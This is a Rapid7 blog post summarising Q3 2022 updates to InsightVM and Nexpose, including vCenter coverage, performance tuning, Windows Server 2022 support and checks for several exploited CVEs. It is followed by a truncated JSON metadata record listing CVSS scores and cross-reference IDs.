What’s New in InsightVM and Nexpose: Q3 2022 in Review

2022-09-28T14:11:35

Description

![What’s New in InsightVM and Nexpose: Q3 2022 in Review](https://blog.rapid7.com/content/images/2022/09/insightvm-q3-2022.jpg) Another quarter comes to a close! While we definitely had our share of summer fun, our team continued to invest in the product, releasing features and updates like recurring coverage for enterprise technologies, performance enhancements, and more. Let’s take a look at some of the key releases in [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) from Q3. ## [[InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) and [Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>)] Recurring coverage for VMware vCenter Recurring coverage provides ongoing, automatic vulnerability coverage for popular enterprise technology and systems. We recently added VMware vCenter to our list. VMware vCenter Server is a centralized management platform used to manage virtual machines, ESXi hosts, and dependent components from a single host. Last year, vCenter was a significant target for bad actors and became the subject of a [number](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>) [of](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>) zero-days. Rapid7 provided ad hoc coverage to protect you against the vulnerabilities. Now, recurring coverage ensures fast, comprehensive protection that provides offensive and defensive security against vCenter vulnerabilities as they arise. ## [InsightVM and Nexpose] Tune Assistant The Security Console in InsightVM and Nexpose contains components that benefit from performance tuning. Tune Assistant is a built-in feature that will calculate performance tuning values based on resources allocated to the Security Console server, then automatically apply those values. Tuning is calculated and applied to all new consoles when the product first starts up, and customers experiencing performance issues on existing consoles can now easily increase their own resources. For more information, read our [docs page](<https://docs.rapid7.com/insightvm/configuring-maximum-performance-in-an-enterprise-environment/>) on configuring maximum performance in an enterprise environment. ![What’s New in InsightVM and Nexpose: Q3 2022 in Review](https://blog.rapid7.com/content/images/2022/09/image1-7.png) ## [InsightVM and Nexpose] Windows Server 2022 Support We want to ensure InsightVM and Nexpose are supported on business-critical technologies and operating systems. We added Windows Server 2022, the latest operating system for servers from Microsoft, to our list. The Scan Engine and Security Console can be installed and will be supported by Rapid7 on Windows Server 2022. [Learn more](<https://www.rapid7.com/products/insightvm/system-requirements/>) about the systems we support. ## [InsightVM and Nexpose] Checks for notable vulnerabilities With exploitation of major vulnerabilities in [Mitel MiVoice Connect](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>), multiple [Confluence](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) [applications](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>), and [other](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) [popular](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>) [solutions](<https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/>), the threat actors definitely did not take it easy this summer. InsightVM and Nexpose customers can assess their exposure to many of these CVEs for vulnerability checks, including: * **Mitel MiVoice Connect Service Appliance | CVE-2022-29499:** An onsite VoIP business phone system, MiVoice Connect had a data validation vulnerability, which arose from insufficient data validation for a diagnostic script. The vulnerability potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>). * **“Questions” add-on for Confluence Application | CVE-2022-26138:** This vulnerability affected “Questions,” an add-on for the Confluence application. It was quickly exploited in the wild once the hardcoded password was released on social media. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>). * **Multiple vulnerabilities in Zimbra Collaboration Suite:** Zimbra, a business productivity suite, was affected by five different vulnerabilities, one of which was unpatched, and four of which were being actively and widely exploited in the wild by well-organized threat actors. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>). * **CVE-2022-30333** * **CVE-2022-27924** * **CVE-2022-27925** * **CVE-2022-37042** * **CVE-2022-37393** We were hard at work this summer making improvements and increasing the level of protections against attackers for our customers. As we head into the fall and the fourth quarter of the year, you can bet we will continue to make InsightVM the best and most comprehensive risk management platform available. Stay tuned for more great things, and have a happy autumn. _**Additional reading:**_ * _[The 2022 SANS Top New Attacks and Threats Report Is In, and It's Required Reading](<https://www.rapid7.com/blog/post/2022/09/14/the-2022-sans-top-new-attacks-and-threats-report-is-in-and-its-required-reading/>)_ * _[InsightVM: Best Practices to Improve Your Console](<https://www.rapid7.com/blog/post/2022/09/12/insightvm-best-practices-to-improve-your-console/>)_ * _[5 Steps for Dealing With Unknown Environments in InsightVM](<https://www.rapid7.com/blog/post/2022/09/06/5-steps-for-dealing-with-unknown-environments-in-insightvm/>)_ * _[What’s New in InsightVM and Nexpose: Q2 2022 in Review](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)_[ ](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) #### NEVER MISS A BLOG Get the latest stories, expertise, and news about security today. Subscribe

{"id": "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review", "description": "![What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review](https://blog.rapid7.com/content/images/2022/09/insightvm-q3-2022.jpg)\n\nAnother quarter comes to a close! While we definitely had our share of summer fun, our team continued to invest in the product, releasing features and updates like recurring coverage for enterprise technologies, performance enhancements, and more. Let\u2019s take a look at some of the key releases in [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) from Q3. \n\n## [[InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) and [Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>)] Recurring coverage for VMware vCenter\n\nRecurring coverage provides ongoing, automatic vulnerability coverage for popular enterprise technology and systems. We recently added VMware vCenter to our list.\n\nVMware vCenter Server is a centralized management platform used to manage virtual machines, ESXi hosts, and dependent components from a single host. Last year, vCenter was a significant target for bad actors and became the subject of a [number](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>) [of](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>) zero-days. Rapid7 provided ad hoc coverage to protect you against the vulnerabilities. Now, recurring coverage ensures fast, comprehensive protection that provides offensive and defensive security against vCenter vulnerabilities as they arise.\n\n## [InsightVM and Nexpose] Tune Assistant\n\nThe Security Console in InsightVM and Nexpose contains components that benefit from performance tuning. Tune Assistant is a built-in feature that will calculate performance tuning values based on resources allocated to the Security Console server, then automatically apply those values.\n\nTuning is calculated and applied to all new consoles when the product first starts up, and customers experiencing performance issues on existing consoles can now easily increase their own resources. For more information, read our [docs page](<https://docs.rapid7.com/insightvm/configuring-maximum-performance-in-an-enterprise-environment/>) on configuring maximum performance in an enterprise environment.\n\n![What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review](https://blog.rapid7.com/content/images/2022/09/image1-7.png)\n\n## [InsightVM and Nexpose] Windows Server 2022 Support\n\nWe want to ensure InsightVM and Nexpose are supported on business-critical technologies and operating systems. We added Windows Server 2022, the latest operating system for servers from Microsoft, to our list. The Scan Engine and Security Console can be installed and will be supported by Rapid7 on Windows Server 2022. [Learn more](<https://www.rapid7.com/products/insightvm/system-requirements/>) about the systems we support. \n\n## [InsightVM and Nexpose] Checks for notable vulnerabilities\n\nWith exploitation of major vulnerabilities in [Mitel MiVoice Connect](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>), multiple [Confluence](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) [applications](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>), and [other](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) [popular](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>) [solutions](<https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/>), the threat actors definitely did not take it easy this summer. InsightVM and Nexpose customers can assess their exposure to many of these CVEs for vulnerability checks, including:\n\n * **Mitel MiVoice Connect Service Appliance | CVE-2022-29499:** An onsite VoIP business phone system, MiVoice Connect had a data validation vulnerability, which arose from insufficient data validation for a diagnostic script. The vulnerability potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>).\n * **\u201cQuestions\u201d add-on for Confluence Application | CVE-2022-26138:** This vulnerability affected \u201cQuestions,\u201d an add-on for the Confluence application. It was quickly exploited in the wild once the hardcoded password was released on social media. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n * **Multiple vulnerabilities in Zimbra Collaboration Suite:** Zimbra, a business productivity suite, was affected by five different vulnerabilities, one of which was unpatched, and four of which were being actively and widely exploited in the wild by well-organized threat actors. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n * **CVE-2022-30333**\n * **CVE-2022-27924**\n * **CVE-2022-27925**\n * **CVE-2022-37042**\n * **CVE-2022-37393**\n\nWe were hard at work this summer making improvements and increasing the level of protections against attackers for our customers. As we head into the fall and the fourth quarter of the year, you can bet we will continue to make InsightVM the best and most comprehensive risk management platform available. Stay tuned for more great things, and have a happy autumn.\n\n_**Additional reading:**_\n\n * _[The 2022 SANS Top New Attacks and Threats Report Is In, and It's Required Reading](<https://www.rapid7.com/blog/post/2022/09/14/the-2022-sans-top-new-attacks-and-threats-report-is-in-and-its-required-reading/>)_\n * _[InsightVM: Best Practices to Improve Your Console](<https://www.rapid7.com/blog/post/2022/09/12/insightvm-best-practices-to-improve-your-console/>)_\n * _[5 Steps for Dealing With Unknown Environments in InsightVM](<https://www.rapid7.com/blog/post/2022/09/06/5-steps-for-dealing-with-unknown-environments-in-insightvm/>)_\n * _[What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)_[ \n](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "published": "2022-09-28T14:11:35", "modified": "2022-09-28T14:11:35", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/", "reporter": "Roshnee Mistry Shah", "references": [], "cvelist": ["CVE-2021-21972", "CVE-2021-22005", "CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-36804", "CVE-2022-37042", "CVE-2022-37393"], "immutableFields": [], "lastseen": "2022-09-28T15:43:01", "viewCount": 57, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8"]}, {"type": "atlassian", "idList": ["BSERV-13438", "CONFSERVER-79000", "CONFSERVER-79016", "CONFSERVER-79483"]}, {"type": "attackerkb", "idList": ["AKB:042573E7-4FF2-4D52-842B-E72379F0C4D0", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:48EF6C32-59B4-4AD7-BE9A-0EE8A2E86072", "AKB:519DD30E-F9A7-4A5E-A57B-DF4E4B9B20F1", "AKB:8049CCA9-ACA9-4288-8493-4153794BD621", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:9CE495DA-1E3B-4486-85DA-2F4FAB15E355", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:C83F5B74-AC72-42D5-A71F-C8F4144C4C9D", "AKB:EFC2EE2A-9172-4B00-94C9-6CC133BD4B05"]}, {"type": "avleonov", "idList": ["AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:99215B2D7808C46D8762AD712CD3D267", "AVLEONOV:E820C062BC9959711E1D1152D8848072"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0106", "CPAI-2021-0728", "CPAI-2022-0297", "CPAI-2022-0331", "CPAI-2022-0357", "CPAI-2022-0467", "CPAI-2022-0515"]}, {"type": "cisa", "idList": ["CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "CISA:71FB648030101FA9B007125DFA636193", "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "CISA:B99FA8E68B4D7FF5BA1F6693AC9C7CCF", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "CISA:D9F4EE6727B9BF3A40025E9D70945311"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-21972", "CISA-KEV-CVE-2021-22005", "CISA-KEV-CVE-2022-26134", "CISA-KEV-CVE-2022-26138", "CISA-KEV-CVE-2022-27924", "CISA-KEV-CVE-2022-27925", "CISA-KEV-CVE-2022-29499", "CISA-KEV-CVE-2022-30333", "CISA-KEV-CVE-2022-37042"]}, {"type": "citrix", "idList": ["CTX460016"]}, {"type": "cnvd", "idList": ["CNVD-2022-60680"]}, {"type": "cve", "idList": ["CVE-2021-21972", "CVE-2021-22005", "CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-36804", "CVE-2022-37042", "CVE-2022-37393"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-30333"]}, {"type": "exploitdb", "idList": ["EDB-ID:49602", "EDB-ID:50056", "EDB-ID:50952"]}, {"type": "githubexploit", "idList": ["02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "098B066E-24CE-5910-B91F-4A11E2A94063", "0AFD46DF-BD61-5745-A809-0746340218B7", "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "11DEDDB4-6148-5800-86D0-BF20A0453109", "120220D8-2281-57EE-BD84-1A33B8841E56", "12691014-3333-5741-80A4-3357BD72D2AC", "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "1C9826FA-B0AD-5C2E-81E6-5842CAA51C4B", "1F9C946C-1533-5835-B5E8-641EF4FFC145", "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "2444574D-533F-593F-8E0E-68EA2B47EF55", "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "26FF3C6A-B806-5D1D-A90A-26774E640721", "28E888C4-78E3-5F8D-B316-AB42FED892F9", "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "2AB84274-77B4-5551-8047-C6DEE2425EFF", "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "2F640351-5EB0-5CEE-9708-5FBA0CA9E296", "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "33431FB9-2A29-5155-B353-2A1A8CDF6994", "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "39EADA2B-CE50-555B-910E-D3B77640C464", "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "423DF4D5-60AF-5663-B196-2A67DD13D226", "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "469B060E-C585-599E-A0D1-AD5D186F70FD", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "4B077A8D-B9A8-51EC-A30C-160FCB41F9CD", "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "4E2B73A6-1A0A-5AE6-A7D0-44663A8164FC", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "50618611-3CA9-5185-8ED3-53532D99D4B7", "50D0DA49-0E53-5DDB-A67D-A87A6928DCFF", "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "53CC55D8-983C-5FA9-AE81-D20750A6612E", "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "56B682D7-17D2-522C-9D1C-67C86911E78F", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "626E6774-0ACC-594C-BB61-E89F8F034B11", "64EF6553-4D22-526B-A1CC-09212DBD7625", "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "66468422-89C0-5AC8-9CEA-6B512338FF7C", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "7BE60530-0495-5366-846A-73B1A778DBDA", "83B145E2-F995-5B1C-863E-164839ED1173", "8F6AEAF4-2161-55F7-96CB-003251BDC309", "93E1AD8B-C5DE-5A5E-86E3-5BDFA59A047A", "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "97046A6F-8428-5DCF-88B4-4101351D637C", "9B660139-27C8-56B8-B9E2-8124D0E9F502", "9CED5B40-DA22-502F-90DC-72294B3BA2BF", "A573E62D-1BE0-5CD3-8E6D-EB184127464A", "A6071ED1-4DD2-5D98-9131-FEFBE84B4664", "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "B47171B0-339A-582E-8AAC-3B18373664B7", "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "BD803D95-E2C1-554D-A0CD-6A594151E77B", "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "D22CFFB0-30A6-5227-8048-C9C028070BD3", "D24F634A-C585-5CC1-90F4-C8360A2B2A24", "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "D4220876-A611-59AE-8262-07797542DAB9", "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "DAAA47B0-5637-5160-BCB3-E488B5CF3512", "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "E443E98A-3304-54B8-97FD-0FEF9DA283B3", "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F42BF447-C1A3-5795-8343-D71F096AFF52", "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "FCDAD5A1-9FBC-5C1B-9851-198B7C227459", "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "FF5905BF-CFF6-58CC-95A4-32C01239A6CF"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "HIVEPRO:9ED83031EC50C160D6AC7D3000DBABA2", "HIVEPRO:C7B009F2018500F22EEB6BE460556ED7", "HIVEPRO:D92A8F5DF20362E41FF86142A0BECE42"]}, {"type": "ibm", "idList": ["425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5"]}, {"type": "kitploit", "idList": ["KITPLOIT:3043339745958474082"]}, {"type": "mageia", "idList": ["MGASA-2022-0206"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "MALWAREBYTES:FD1933FDD45B339A42C8A69C46589A0D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-FILEFORMAT-UNRAR_CVE_2022_30333-", "MSF:EXPLOIT-LINUX-HTTP-BITBUCKET_GIT_CMD_INJECTION-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_MBOXIMPORT_CVE_2022_27925-", "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_UNRAR_CVE_2022_30333-", "MSF:EXPLOIT-LINUX-LOCAL-ZIMBRA_SLAPPER_PRIV_ESC-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-"]}, {"type": "nessus", "idList": ["BITBUCKET_8_3_1.NASL", "CITRIX_ADM_CTX460016.NASL", "CONFLUENCE_CONFSERVER-79483.NASL", "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "CONFLUENCE_CVE-2022-26138.NASL", "CONFLUENCE_CVE_2022_26134.NBIN", "SUSE_SU-2022-1760-1.NASL", "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_CVE-2021-22005.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL", "WEB_APPLICATION_SCANNING_113243", "WEB_APPLICATION_SCANNING_113248", "WEB_APPLICATION_SCANNING_113311", "WEB_APPLICATION_SCANNING_113328", "ZIMBRA_9_0_0_P24.NASL", "ZIMBRA_9_0_0_P26.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:163268", "PACKETSTORM:164439", "PACKETSTORM:167430", "PACKETSTORM:167449", "PACKETSTORM:167989", "PACKETSTORM:168048", "PACKETSTORM:168146", "PACKETSTORM:168470"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:AE4AA7402829D66599C8A25E83DD0FD2", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DE2E40D3BB574E53C7448F3A304849C9", "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:53518D68C99AC0CB034AE29BCE42D594", "RAPID7BLOG:559E0E8D2A3CCC9876788213E94E36A4", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:84EC5F57BD07F535627F51F28B2424B1", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5", "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "RAPID7BLOG:BCF3916E38EC7840E9BABBDD5431352B", "RAPID7BLOG:C1B4AB12CDDD030CDAB31AA2F9E27438", "RAPID7BLOG:C3FB7B0BA665AC291B6331292F32F47A", "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "RAPID7BLOG:F35EA4220CACE146EF8E5F845F2B51BF", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "securelist", "idList": ["SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1"]}, {"type": "seebug", "idList": ["SSV:99260"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1CC8B88D18FD4407B2AEF8B648A80C27"]}, {"type": "thn", "idList": ["THN:0488E447E08622B0366A0332F848212D", "THN:065BFC8E7532E662AE90BB82F405B132", "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:2DA6F98EC7A48A092478A6E6EB267C1C", "THN:2DEB4686E139C399EEA9A6B1BCC9EE96", "THN:362401076AC227D49D729838DBDC2052", "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "THN:4376782A3F009FEED68FDD2022A11EF5", "THN:49CD77302B5D845459BA34357D9C011C", "THN:4F010A66018968CA6DAA0432C00DAE10", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:7657424EABF9BB266876E3BD437269F4", "THN:76E9C775EE4ECFF3F3F1E02BCA0BE2F2", "THN:86F6539B2FD5CE0DEC7585157E18CBEF", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:908A39F901145B6FD175B16E95137ACC", "THN:A48A11A9708B43B68518F6625F1C0CB8", "THN:DE707FE81271E115F82D9DA443CC56C8", "THN:E0B486DA1C8CE77D0DF337E8307100D6", "THN:EAE0157F6308D86DB939FA200A017132", "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "THN:F0450E1253FFE5CA527F039D3B3A72BD", "THN:F050B7CE35D52E330ED83AACF83D6B29", "THN:F3EF5A59C1D2BE2109DA45313D74AAAD", "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:14DD6B793DC77F25538436F7D14C922B", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "THREATPOST:52B3DE7108A575C635073D53A3E635EE", "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "THREATPOST:7F03D6D7702417D24F26A06CBC31EE83", "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "THREATPOST:8C179A769DB315AF46676A862FC3D942", "THREATPOST:CD203B10BCB138850F42815F74C8A5AF"]}, {"type": "trendmicroblog", "idList": 